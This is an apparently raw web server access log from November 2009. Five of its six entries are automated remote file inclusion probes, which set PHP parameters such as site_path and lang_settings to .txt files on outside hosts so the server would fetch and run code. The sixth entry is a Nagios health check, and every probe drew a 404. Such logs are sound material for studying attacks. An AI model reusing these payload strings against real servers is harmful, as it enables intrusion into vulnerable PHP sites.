77.221.130.17 - - [13/Nov/2009:02:58:25 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.muprosgame.com///kampret/rocks.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
209.97.212.185 - - [13/Nov/2009:02:58:44 -0500] "GET /logs/access_log.Q109061200%20%20//includes/ktedit/toolbar.php?dirDepth=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Nov/2009:02:58:45 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.192.20.164 - - [13/Nov/2009:02:58:50 -0500] "GET /logs/access_log.Q109060300//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:02:58:50 -0500] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Nov/2009:02:58:50 -0500] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
